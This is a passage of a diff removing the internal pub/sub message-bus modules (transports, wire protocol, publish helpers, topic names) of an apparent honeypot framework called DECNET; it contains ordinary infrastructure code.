    async def __aexit__(self, *exc: Any) -> None:
        await self.aclose()
|
||||
|
||||
|
||||
class BaseBus(abc.ABC):
    """Contract every pub/sub transport implements.

    Implementations MUST tolerate repeated ``await connect()`` and repeated
    ``await close()``.  Publishing to, or subscribing on, a closed bus
    raises :class:`RuntimeError`.

    The bus is also an async context manager: entering connects, leaving
    closes.
    """

    async def __aenter__(self) -> "BaseBus":
        await self.connect()
        return self

    async def __aexit__(self, *exc: Any) -> None:
        await self.close()

    @abc.abstractmethod
    async def connect(self) -> None:
        """Set up whatever network/transport resources are needed. Idempotent."""

    @abc.abstractmethod
    async def close(self) -> None:
        """Release transport resources. Idempotent."""

    @abc.abstractmethod
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Send *payload* on *topic*, fire-and-forget.

        Delivery is at-most-once.  On a transport error the implementation
        logs and returns instead of raising: losing a bus message must not
        cascade into a worker failure, because the DB is the source of truth.
        """

    @abc.abstractmethod
    def subscribe(self, pattern: str) -> Subscription:
        """Open a :class:`Subscription` yielding events that match *pattern*.

        Patterns use NATS wildcard semantics: ``*`` matches a single topic
        token and ``>`` matches one or more trailing tokens.  For example:

        * ``topology.*.mutation.applied`` — ``applied`` events of every
          topology.
        * ``topology.abc123.mutation.*`` — every mutation state of one
          topology.
        * ``topology.>`` — everything below the ``topology`` root.
        """
|
||||
|
||||
|
||||
# ─── Wildcard matching shared across in-process transports ───────────────────
|
||||
|
||||
def matches(pattern: str, topic: str) -> bool:
    """Tell whether *topic* satisfies *pattern* under NATS wildcard rules.

    Both strings are split on ``.``.  A ``*`` pattern token accepts exactly
    one non-empty topic token.  A ``>`` pattern token accepts whatever
    remains as long as at least one topic token is left at that position
    (``topology.>`` matches ``topology.abc.x`` but not bare ``topology``);
    anything after ``>`` in the pattern is never inspected.  Every other
    pattern token must equal the topic token at the same position, and the
    token counts must agree.
    """
    wanted = pattern.split(".")
    actual = topic.split(".")
    available = len(actual)
    for pos, token in enumerate(wanted):
        if token == ">":
            # Tail wildcard: succeeds iff something is left to consume.
            return pos < available
        if pos >= available:
            return False
        seen = actual[pos]
        if token == "*":
            if seen == "":
                return False
        elif token != seen:
            return False
    return len(wanted) == available
|
||||
|
||||
|
||||
# In-process transports push this marker through the same asyncio.Queue
# that carries events to say "no more events", which avoids a separate
# control channel.  It never appears on the wire.
_CLOSE_SENTINEL: Any = object()


async def _next_or_stop(queue: "asyncio.Queue[Any]") -> Event:
    """Await the next queue item; raise ``StopAsyncIteration`` on the close marker."""
    received = await queue.get()
    if received is not _CLOSE_SENTINEL:
        return received
    raise StopAsyncIteration
|
||||
@@ -1,85 +0,0 @@
|
||||
"""Bus factory — selects a :class:`~decnet.bus.base.BaseBus` implementation.
|
||||
|
||||
Dispatch key: the ``DECNET_BUS_TYPE`` environment variable.
|
||||
|
||||
* ``unix`` (default) → :class:`~decnet.bus.unix_client.UnixSocketBus`
|
||||
* ``fake`` → :class:`~decnet.bus.fake.FakeBus` (in-process)
|
||||
|
||||
If ``DECNET_BUS_ENABLED`` is ``"false"`` the factory short-circuits to
|
||||
:class:`~decnet.bus.fake.NullBus` regardless of ``DECNET_BUS_TYPE`` — a
|
||||
cheap way for dev environments to run workers without a bus daemon.
|
||||
|
||||
Mirrors :mod:`decnet.web.db.factory` (lazy imports inside each branch,
|
||||
env-driven dispatch, optional telemetry wrapping). Callers MUST use
|
||||
:func:`get_bus` rather than instantiating transports directly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus.base import BaseBus
|
||||
|
||||
|
||||
def get_bus(**kwargs: Any) -> BaseBus:
    """Instantiate the bus implementation selected by environment.

    ``DECNET_BUS_ENABLED=false`` (case-insensitive) short-circuits to
    ``NullBus`` and ignores every keyword argument.  Otherwise
    ``DECNET_BUS_TYPE`` (default ``unix``) picks the transport and the
    keyword arguments are forwarded to it:

    * ``UnixSocketBus`` accepts ``socket_path`` (overrides
      ``DECNET_BUS_SOCKET``) and ``client_name``.
    * ``FakeBus`` accepts ``queue_size``.  The unix-only arguments
      ``socket_path`` and ``client_name`` are dropped for this transport so
      that a call site written for the real bus (for example
      ``get_bus(client_name="api")``) keeps working when the environment
      selects the fake one.

    Raises:
        ValueError: if ``DECNET_BUS_TYPE`` names an unknown transport.
    """
    if os.environ.get("DECNET_BUS_ENABLED", "true").lower() == "false":
        from decnet.bus.fake import NullBus

        return NullBus()

    bus_type = os.environ.get("DECNET_BUS_TYPE", "unix").lower()

    if bus_type == "unix":
        from decnet.bus.unix_client import UnixSocketBus

        socket_path = kwargs.pop("socket_path", None) or _default_socket_path()
        bus: BaseBus = UnixSocketBus(socket_path=socket_path, **kwargs)
    elif bus_type == "fake":
        from decnet.bus.fake import FakeBus

        # FakeBus.__init__ only understands ``queue_size``; forwarding the
        # unix transport's options would raise TypeError.  Unknown keywords
        # are still passed through so genuine typos keep failing loudly.
        for unix_only in ("socket_path", "client_name"):
            kwargs.pop(unix_only, None)
        bus = FakeBus(**kwargs)
    else:
        raise ValueError(f"Unsupported bus type: {bus_type}")

    return _maybe_wrap_telemetry(bus)
|
||||
|
||||
|
||||
def _default_socket_path() -> str:
    """Resolve the bus socket path.

    Resolution order:

    1. ``DECNET_BUS_SOCKET`` when set to a non-empty value.
    2. ``/run/decnet/bus.sock`` when ``/run/decnet`` is an existing,
       writable directory.  This is preferred because systemd's
       ``RuntimeDirectory=decnet`` creates it with the right permissions.
    3. ``~/.decnet/bus.sock`` (home expanded), which keeps dev boxes usable
       without systemd.
    """
    override = os.environ.get("DECNET_BUS_SOCKET")
    if override:
        return override

    runtime_dir = "/run/decnet"
    runtime_usable = os.path.isdir(runtime_dir) and os.access(runtime_dir, os.W_OK)
    if not runtime_usable:
        return os.path.expanduser("~/.decnet/bus.sock")
    return f"{runtime_dir}/bus.sock"
|
||||
|
||||
|
||||
def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    """Return *bus* wrapped by the telemetry proxy when that is possible.

    The wrapper is :func:`decnet.telemetry.wrap_repository`, reused here for
    the bus.  If that name cannot be imported, or the wrapping call itself
    raises, the original *bus* is handed back unchanged.
    """
    try:
        from decnet.telemetry import wrap_repository  # type: ignore[attr-defined]
    except ImportError:
        # Telemetry is not wired up at all: nothing to wrap with.
        result = bus
    else:
        try:
            result = wrap_repository(bus)
        except Exception:  # pragma: no cover - defensive
            result = bus
    return result
|
||||
@@ -1,183 +0,0 @@
|
||||
"""In-process bus transports.
|
||||
|
||||
* :class:`FakeBus` — real pub/sub semantics without touching a socket. Used
|
||||
by unit tests and anywhere ``DECNET_BUS_TYPE=fake`` is set. Lets code
|
||||
that depends on the bus be exercised entirely inside a single event loop,
|
||||
matching the DECNET testing convention of not opening real network
|
||||
sockets from unit tests.
|
||||
* :class:`NullBus` — no-op. Returned by :func:`~decnet.bus.factory.get_bus`
|
||||
when ``DECNET_BUS_ENABLED=false`` so workers can start cleanly in dev
|
||||
environments where no bus daemon is running. Publishes are dropped;
|
||||
subscriptions yield nothing and close cleanly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus.base import (
|
||||
BaseBus,
|
||||
Event,
|
||||
Subscription,
|
||||
_CLOSE_SENTINEL,
|
||||
matches,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.fake")
|
||||
|
||||
# Default bound for each subscriber's queue.  When a queue is full the
# oldest entry is dropped, so a slow consumer can never stall a publisher;
# losing events is acceptable because the DB, not the bus, is the source
# of truth.
_DEFAULT_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
# ─── FakeBus ─────────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class _FakeSubscription(Subscription):
    """Subscription whose events arrive on an :class:`asyncio.Queue`.

    :meth:`FakeBus.publish` fills the queue; closing the subscription removes
    it from the owning bus.
    """

    def __init__(self, bus: "FakeBus", pattern: str, queue: "asyncio.Queue[Any]") -> None:
        super().__init__(pattern)
        self._bus = bus
        self._queue = queue

    async def __anext__(self) -> Event:
        # Once closed, stop immediately without touching the queue.
        if not self._closed:
            nxt = await self._queue.get()
            if nxt is not _CLOSE_SENTINEL:
                return nxt
        raise StopAsyncIteration

    async def _aclose(self) -> None:
        self._bus._unregister(self)
        # Wake a consumer that may be parked in __anext__.  If the queue is
        # full the marker is skipped; __anext__ then stops via ``_closed``.
        try:
            self._queue.put_nowait(_CLOSE_SENTINEL)
        except asyncio.QueueFull:
            pass
|
||||
|
||||
|
||||
class FakeBus(BaseBus):
    """In-process pub/sub.

    Publishes iterate every active subscription and enqueue the event on
    the ones whose pattern matches the topic.  If a subscriber's queue is
    full, the oldest event is discarded to make room — same at-most-once
    semantics as the real UNIX-socket transport.
    """

    def __init__(self, queue_size: int = _DEFAULT_QUEUE_SIZE) -> None:
        # ``queue_size`` bounds every per-subscriber queue created later.
        self._queue_size = queue_size
        self._subs: list[_FakeSubscription] = []
        self._connected = False
        self._closed = False
        self._lock = asyncio.Lock()

    async def connect(self) -> None:
        """Mark the bus connected; there is no real transport to set up."""
        self._connected = True

    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Deliver a new :class:`Event` to every matching subscription.

        Raises:
            RuntimeError: if the bus has been closed.
        """
        if self._closed:
            raise RuntimeError("publish on closed bus")
        event = Event(topic=topic, payload=payload, type=event_type)
        # Snapshot the matching subscribers under the lock, then enqueue
        # outside it.
        async with self._lock:
            targets = [s for s in self._subs if matches(s.pattern, topic)]
        for sub in targets:
            _enqueue_drop_oldest(sub._queue, event)

    def subscribe(self, pattern: str) -> Subscription:
        """Register and return a queue-backed subscription for *pattern*.

        Raises:
            RuntimeError: if the bus has been closed.
        """
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=self._queue_size)
        sub = _FakeSubscription(self, pattern, queue)
        self._subs.append(sub)
        return sub

    def _unregister(self, sub: _FakeSubscription) -> None:
        """Forget *sub*; unknown subscriptions are ignored."""
        try:
            self._subs.remove(sub)
        except ValueError:
            pass

    async def close(self) -> None:
        """Close the bus and end every open subscription. Idempotent."""
        if self._closed:
            return
        self._closed = True
        # Wake every still-open subscription so iterators unblock cleanly.
        # The marker is enqueued with the drop-oldest policy: a plain
        # put_nowait() would be skipped on a full queue, and that consumer
        # would drain its backlog and then wait forever, because nothing
        # else ever tells it the bus is gone.
        for sub in list(self._subs):
            _enqueue_drop_oldest(sub._queue, _CLOSE_SENTINEL)
        self._subs.clear()
|
||||
|
||||
|
||||
def _enqueue_drop_oldest(queue: "asyncio.Queue[Any]", event: Event) -> None:
    """Enqueue *event*, evicting the oldest entries while the queue is full.

    Kept as a standalone helper so FakeBus and the real UNIX server can
    share one backpressure policy.  Each eviction is logged at warning
    level.  If the queue reports full yet has nothing to evict, the event
    is silently given up on.
    """
    while True:
        try:
            queue.put_nowait(event)
        except asyncio.QueueFull:
            pass
        else:
            return
        # Full: make room by discarding the head, then retry the put.
        try:
            evicted = queue.get_nowait()
        except asyncio.QueueEmpty:
            return
        log.warning(
            "bus.fake: subscriber queue full, dropped %s", getattr(evicted, "topic", "?")
        )
|
||||
|
||||
|
||||
# ─── NullBus ─────────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class _NullSubscription(Subscription):
    """Empty subscription: iteration ends at once and closing does nothing."""

    async def __anext__(self) -> Event:
        # There is never anything to deliver.
        raise StopAsyncIteration

    async def _aclose(self) -> None:
        return None
|
||||
|
||||
|
||||
class NullBus(BaseBus):
    """Do-nothing bus selected when ``DECNET_BUS_ENABLED=false``.

    Every publish is discarded and every subscription is empty.  It exists
    for dev environments without a bus daemon: the process starts cleanly,
    publishing code needs no feature flag, and nothing ever waits on a
    subscriber.
    """

    async def connect(self) -> None:
        return None

    async def close(self) -> None:
        return None

    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        # Intentionally drops the message.
        return None

    def subscribe(self, pattern: str) -> Subscription:
        return _NullSubscription(pattern)
|
||||
@@ -1,144 +0,0 @@
|
||||
"""Wire protocol for the DECNET bus UNIX-socket transport.
|
||||
|
||||
Frame layout:
|
||||
|
||||
<VERB> [<args ...>]\\n # ASCII header, single line, no trailing space
|
||||
<4-byte big-endian body length>
|
||||
<body> # orjson-serialized dict, or empty (length 0)
|
||||
|
||||
Verbs:
|
||||
|
||||
* ``HELLO <client-name>`` — optional greeting, logged by server. Body empty.
|
||||
* ``PUB <topic>`` — publisher → server. Body = payload dict.
|
||||
* ``SUB <pattern>`` — subscriber → server. Body empty.
|
||||
* ``UNSUB <pattern>`` — subscriber → server. Body empty.
|
||||
* ``EVT <topic>`` — server → subscriber. Body = payload dict (wrapped
|
||||
in an :class:`~decnet.bus.base.Event` envelope).
|
||||
* ``BYE`` — either direction. Body empty. Graceful shutdown.
|
||||
|
||||
Parsing rules:
|
||||
|
||||
* The header is a single line terminated by ``\\n`` (LF). ``\\r`` is tolerated
|
||||
but not required.
|
||||
* Header tokens are whitespace-separated. The first token is the verb;
|
||||
everything after is verb-specific. We split on the first space only so
|
||||
topics / patterns with quoted content are not supported (they are not
|
||||
needed — topic segments forbid whitespace per :mod:`decnet.bus.topics`).
|
||||
* Maximum header length is 4096 bytes; maximum body length is 1 MiB. Beyond
|
||||
those, the connection is dropped with a logged error. This is a honeypot
|
||||
framework, not a general-purpose message broker; a malformed frame is
|
||||
treated as hostile.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import struct
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
import orjson
|
||||
|
||||
# Frame size limits enforced by encode() and read_frame().
MAX_HEADER_BYTES = 4096
MAX_BODY_BYTES = 1024 * 1024  # 1 MiB

# Protocol verbs.  Reference these names instead of spelling the strings.
HELLO = "HELLO"
PUB = "PUB"
SUB = "SUB"
UNSUB = "UNSUB"
EVT = "EVT"
BYE = "BYE"

# Membership set used to reject unknown verbs.
_VALID_VERBS = frozenset((HELLO, PUB, SUB, UNSUB, EVT, BYE))
|
||||
|
||||
|
||||
class ProtocolError(Exception):
    """A frame was malformed or too large; the connection should be closed."""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
class Frame:
    """One parsed frame.

    ``body`` holds the raw, still-encoded bytes.  The protocol layer cannot
    know whether a given verb carries a dict or nothing at all, so decoding
    with orjson is left to the caller.
    """

    verb: str
    # Remainder of the header line after the verb, trimmed.
    args: str
    body: bytes
|
||||
|
||||
|
||||
def encode(verb: str, args: str = "", body: dict[str, Any] | None = None) -> bytes:
    """Build the wire bytes for one frame.

    The result is the ASCII header line (``verb``, a space and ``args``,
    right-stripped, then ``\\n``), a 4-byte big-endian body length, and the
    body itself.  *body* is orjson-encoded when given; ``None`` produces an
    empty body.

    Raises:
        ProtocolError: for an unknown verb, for ``args`` containing a CR or
            LF, or when the body or header exceeds its size limit.
    """
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")
    # The header is a single line, so args may not smuggle in a line break.
    if any(line_break in args for line_break in ("\n", "\r")):
        raise ProtocolError("args must not contain newline characters")

    encoded_body = orjson.dumps(body) if body is not None else b""
    body_size = len(encoded_body)
    if body_size > MAX_BODY_BYTES:
        raise ProtocolError(
            f"body {body_size} bytes exceeds max {MAX_BODY_BYTES}"
        )

    # rstrip() removes the separator space when args is empty.
    header_line = (f"{verb} {args}".rstrip() + "\n").encode("ascii")
    header_size = len(header_line)
    if header_size > MAX_HEADER_BYTES:
        raise ProtocolError(
            f"header {header_size} bytes exceeds max {MAX_HEADER_BYTES}"
        )
    return b"".join((header_line, struct.pack(">I", body_size), encoded_body))
|
||||
|
||||
|
||||
async def read_frame(reader: asyncio.StreamReader) -> Frame | None:
    """Read one frame from *reader*.

    Returns ``None`` on clean EOF before a new frame starts.

    Raises:
        ProtocolError: on any malformed input — the stream ends inside the
            header, length prefix or body; the header overruns the reader's
            buffer limit or ``MAX_HEADER_BYTES``; the header is empty or not
            ASCII; the verb is unknown; or the announced body length
            exceeds ``MAX_BODY_BYTES``.  The caller should close the
            connection.
    """
    try:
        header = await reader.readuntil(b"\n")
    except asyncio.IncompleteReadError as exc:
        if not exc.partial:
            # Nothing was read: the peer hung up between frames.
            return None
        raise ProtocolError("connection closed mid-header") from exc
    except asyncio.LimitOverrunError as exc:
        raise ProtocolError("header exceeded buffer limit") from exc

    if len(header) > MAX_HEADER_BYTES:
        raise ProtocolError(f"header {len(header)} bytes exceeds max")

    try:
        line = header.rstrip(b"\r\n").decode("ascii", errors="strict")
    except UnicodeDecodeError as exc:
        # Non-ASCII header bytes are malformed input; report them through
        # the documented exception type instead of leaking a codec error.
        raise ProtocolError("header is not valid ASCII") from exc
    if not line:
        raise ProtocolError("empty header line")

    verb, _, args = line.partition(" ")
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")

    try:
        length_bytes = await reader.readexactly(4)
        (body_len,) = struct.unpack(">I", length_bytes)
        if body_len > MAX_BODY_BYTES:
            raise ProtocolError(f"body length {body_len} exceeds max")
        body = await reader.readexactly(body_len) if body_len else b""
    except asyncio.IncompleteReadError as exc:
        # Once a header has arrived, EOF is a truncated frame, not a clean
        # shutdown — handled the same way as EOF inside the header.
        raise ProtocolError("connection closed mid-frame") from exc

    return Frame(verb=verb, args=args.strip(), body=body)
|
||||
|
||||
|
||||
def decode_body(body: bytes) -> dict[str, Any]:
    """Parse a frame body into a dict; an empty body yields ``{}``.

    Raises:
        ProtocolError: if the bytes are not valid JSON, or the decoded value
            is not a JSON object.
    """
    if not body:
        return {}
    try:
        parsed = orjson.loads(body)
    except orjson.JSONDecodeError as exc:
        raise ProtocolError(f"body is not valid JSON: {exc}") from exc
    if isinstance(parsed, dict):
        return parsed
    raise ProtocolError(f"body must be a JSON object, got {type(parsed).__name__}")
|
||||
@@ -1,211 +0,0 @@
|
||||
"""Fire-and-forget publish helpers shared across every worker.
|
||||
|
||||
Lifted out of ``decnet/mutator/engine.py`` once a second caller showed up
|
||||
(DEBT-031). Keeping one implementation means the "never break the worker
|
||||
loop" guarantee is audited in exactly one place.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import os
|
||||
import signal
|
||||
import time
|
||||
from typing import Any, Callable
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.publish")
|
||||
|
||||
|
||||
async def publish_safely(
    bus: BaseBus | None,
    topic: str,
    payload: dict[str, Any],
    event_type: str = "",
) -> None:
    """Publish on *bus*, guaranteeing that no ``Exception`` reaches the caller.

    By the time a worker gets here the DB row (or equivalent side effect) is
    already committed; the bus only notifies and is not the source of truth.
    Losing a publish costs at most a few seconds of UI latency until the
    next poll tick, whereas an exception escaping from here would crash the
    worker — strictly worse.  A ``None`` bus makes this a no-op.
    """
    if bus is not None:
        try:
            await bus.publish(topic, payload, event_type=event_type)
        except Exception as exc:  # noqa: BLE001
            log.warning("bus publish failed topic=%s: %s", topic, exc)
|
||||
|
||||
|
||||
def make_thread_safe_publisher(
    bus: BaseBus | None,
    loop: asyncio.AbstractEventLoop,
) -> Callable[[str, dict[str, Any], str], None]:
    """Build a sync callable that marshals publishes back to *loop*.

    Workers that run their hot paths in a worker thread (scapy sniff loop,
    ``asyncio.to_thread`` probes, blocking socket reads) cannot ``await``
    the bus directly.  The returned function schedules
    :func:`publish_safely` on *loop* via ``run_coroutine_threadsafe`` and
    returns immediately — the calling thread never waits for the publish.

    A ``None`` bus yields a no-op callable, matching the degraded-mode
    contract the rest of this module already upholds.

    Returns:
        ``publish(topic, payload, event_type="")``, which always returns
        ``None`` and never raises for scheduling failures.
    """
    if bus is None:
        return lambda _topic, _payload, _event_type="": None

    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
        # (shutdown race).  Short-circuit here so we don't marshal a
        # coroutine onto a dead loop just to have publish_safely swallow
        # it.  bus.publish's own WARN-once guard handles the rare case
        # where _closed flips between this check and the coroutine
        # actually running.
        if getattr(bus, "_closed", False):
            return
        coro = publish_safely(bus, topic, payload, event_type=event_type)
        try:
            asyncio.run_coroutine_threadsafe(coro, loop)
        except Exception as exc:  # noqa: BLE001
            # Scheduling failed (e.g. the loop is already closed), so the
            # coroutine will never run.  Close it explicitly; otherwise
            # Python emits a "coroutine ... was never awaited" warning when
            # it is garbage-collected.
            coro.close()
            log.debug("cross-thread bus publish failed topic=%s: %s", topic, exc)

    return _publish
|
||||
|
||||
|
||||
async def run_health_heartbeat(
    bus: BaseBus | None,
    worker: str,
    *,
    interval: float = 30.0,
    extra: Callable[[], dict[str, Any]] | None = None,
) -> None:
    """Emit a health event for *worker* every *interval* seconds, forever.

    The topic comes from ``_topics.system_health(worker)``.  Each tick
    publishes ``{"worker": <name>, "ts": <unix-ts>}`` merged with whatever
    ``extra()`` returns; a failing ``extra()`` is logged at debug level and
    the tick goes out without its data.  Publishing goes through
    :func:`publish_safely`, so with a ``None`` bus the loop degrades to a
    plain sleep cycle that can still be cancelled the usual way
    (``asyncio.create_task`` / ``.cancel()``).

    Cancellation-safe: ``CancelledError`` raised inside the loop is absorbed
    and the coroutine returns normally, so whoever awaits the task during
    shutdown sees a clean exit.
    """
    topic = _topics.system_health(worker)
    try:
        while True:
            beat: dict[str, Any] = {"worker": worker, "ts": time.time()}
            if extra is not None:
                try:
                    beat.update(extra())
                except Exception as exc:  # noqa: BLE001
                    log.debug("heartbeat extra() failed worker=%s: %s", worker, exc)
            await publish_safely(bus, topic, beat, event_type=_topics.SYSTEM_HEALTH)
            await asyncio.sleep(interval)
    except asyncio.CancelledError:
        return
|
||||
|
||||
|
||||
async def run_control_listener(
    bus: BaseBus | None,
    worker: str,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to the worker's control topic and honour stop intents.

    The topic comes from ``_topics.system_control(worker)``.  On a
    well-formed ``{"action": "stop", ...}`` message the function sets
    *shutdown* and returns — the worker's main loop is expected to check
    the event and unwind cleanly, matching the SIGTERM path.

    Malformed messages (missing/unknown action, non-dict payload) are logged
    at debug level and skipped; the listener keeps running.  An exception
    from the transport ends the listener with a warning.  A ``None`` bus
    yields a coroutine that simply awaits *shutdown* — callers can
    ``create_task`` this unconditionally regardless of bus state.

    Cancellation-safe: ``CancelledError`` is absorbed.
    """
    if bus is None:
        with contextlib.suppress(asyncio.CancelledError):
            await shutdown.wait()
        return

    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    if not isinstance(payload, dict):
                        # Without this guard ``payload.get`` raises
                        # AttributeError, which would tear down the whole
                        # subscription and disable bus-driven shutdown.
                        log.debug(
                            "control: ignoring non-dict payload worker=%s type=%s",
                            worker, type(payload).__name__,
                        )
                        continue
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s",
                            worker, requested_by,
                        )
                        shutdown.set()
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control listener failed worker=%s: %s — shutdown via bus disabled",
                worker, exc,
            )
|
||||
|
||||
|
||||
async def run_control_listener_signal(
    bus: BaseBus | None,
    worker: str,
) -> None:
    """Like :func:`run_control_listener` but signals the process on stop.

    Preferred for workers whose main loop is a blocking thread
    (container-log tail, PTY read, scapy sniff) — wiring an
    ``asyncio.Event`` through the thread boundary is error-prone, and
    every DECNET worker already has systemd-equivalent SIGTERM cleanup.
    A SIGTERM self-signal routes the stop through that same path
    without inventing a second shutdown mechanism.

    Malformed messages (missing/unknown action, non-dict payload) are logged
    at debug level and skipped.  A ``None`` bus returns immediately.

    Cancellation-safe.  Never raises: a failed self-signal is logged
    and the loop simply exits (admin can fall back to ``systemctl``).
    """
    if bus is None:
        return

    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    if not isinstance(payload, dict):
                        # Without this guard ``payload.get`` raises
                        # AttributeError, which would tear down the whole
                        # subscription and disable bus-driven shutdown.
                        log.debug(
                            "control: ignoring non-dict payload worker=%s type=%s",
                            worker, type(payload).__name__,
                        )
                        continue
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s → SIGTERM self",
                            worker, requested_by,
                        )
                        try:
                            os.kill(os.getpid(), signal.SIGTERM)
                        except Exception as exc:  # noqa: BLE001
                            log.warning(
                                "control: self-signal failed worker=%s: %s",
                                worker, exc,
                            )
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control signal listener failed worker=%s: %s",
                worker, exc,
            )
|
||||
@@ -1,398 +0,0 @@
|
||||
"""Canonical topic hierarchy for the DECNET ServiceBus.
|
||||
|
||||
Locked early so consumers can subscribe with stable wildcard patterns.
|
||||
Adding new topic families is fine; **renaming** existing ones is a breaking
|
||||
change for every subscriber and requires a coordinated rollout.
|
||||
|
||||
Token structure (NATS-style, dot-separated):
|
||||
|
||||
topology.{topology_id}.mutation.{state}
|
||||
topology.{topology_id}.status
|
||||
decky.{decky_id}.state
|
||||
decky.{decky_id}.traffic
|
||||
orchestrator.traffic.{decky_id}
|
||||
orchestrator.file.{decky_id}
|
||||
orchestrator.email.{decky_id}
|
||||
attacker.observed
|
||||
attacker.scored
|
||||
attacker.session.started
|
||||
attacker.session.ended
|
||||
identity.formed
|
||||
identity.observation.linked
|
||||
identity.merged
|
||||
identity.unmerged
|
||||
identity.campaign.assigned
|
||||
campaign.formed
|
||||
campaign.identity.assigned
|
||||
campaign.merged
|
||||
campaign.unmerged
|
||||
credential.captured
|
||||
credential.reuse.detected
|
||||
canary.{token_id}.triggered
|
||||
canary.{token_id}.placed
|
||||
canary.{token_id}.revoked
|
||||
system.log
|
||||
system.bus.health
|
||||
system.{worker}.health
|
||||
|
||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||
|
||||
* ``*`` matches exactly one token.
|
||||
* ``>`` matches one-or-more trailing tokens (so ``topology.>`` matches
|
||||
``topology.abc.status`` but not the bare root ``topology``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
# ─── Root prefixes ───────────────────────────────────────────────────────────
|
||||
|
||||
TOPOLOGY = "topology"
|
||||
DECKY = "decky"
|
||||
ATTACKER = "attacker"
|
||||
IDENTITY = "identity"
|
||||
CAMPAIGN = "campaign"
|
||||
SYSTEM = "system"
|
||||
CREDENTIAL = "credential"
|
||||
ORCHESTRATOR = "orchestrator"
|
||||
CANARY = "canary"
|
||||
|
||||
|
||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||
|
||||
# Topology mutation lifecycle states — keep in sync with TopologyMutation.state
|
||||
# in decnet/web/db/models.py; the bus topic mirrors the DB state machine.
|
||||
MUTATION_ENQUEUED = "enqueued"
|
||||
MUTATION_APPLYING = "applying"
|
||||
MUTATION_APPLIED = "applied"
|
||||
MUTATION_FAILED = "failed"
|
||||
|
||||
# Topology-level status transitions (topology.{id}.status): fires when the
|
||||
# topology row's status column changes (pending/deploying/active/degraded/failed).
|
||||
TOPOLOGY_STATUS = "status"
|
||||
|
||||
# Decky-level event types (third token, after the decky id).
|
||||
DECKY_STATE = "state"
|
||||
DECKY_TRAFFIC = "traffic"
|
||||
# On-demand mutation request — published by the API/CLI/UI, consumed by
|
||||
# the mutator's watch loop to force an immediate mutation of one decky
|
||||
# without waiting for its scheduled interval. Underscored (not dotted)
|
||||
# to stay a single NATS token so the builder's validator accepts it.
|
||||
DECKY_MUTATE_REQUEST = "mutate_request"
|
||||
# Mutation transition event — distinct from DECKY_STATE ("current
|
||||
# shape") because a mutation is a *transition* that carries old/new
|
||||
# services + trigger + timing. Correlator consumes these (via the
|
||||
# syslog sidechannel too) to interleave substrate-change markers into
|
||||
# attacker traversals.
|
||||
DECKY_MUTATION = "mutation"
|
||||
|
||||
# Attacker event types (second token under the ``attacker`` root). First
|
||||
# sighting, session boundary transitions, and score-threshold crossings
|
||||
# published by correlator + profiler. Consumers typically subscribe to
|
||||
# the wildcard ``attacker.>``.
|
||||
ATTACKER_OBSERVED = "observed"
|
||||
ATTACKER_SCORED = "scored"
|
||||
# Published once per successful active probe result (JARM/HASSH/TCPfp).
|
||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||
# a fingerprint is additional evidence about an already-observed attacker.
|
||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||
ATTACKER_SESSION_STARTED = "session.started"
|
||||
ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||
# succeeds for an attacker IP (one or more 3rd-party intel providers
|
||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||
|
||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||
# Published by the (future) clusterer worker — see
|
||||
# development/IDENTITY_RESOLUTION.md. Constants ship in this commit;
|
||||
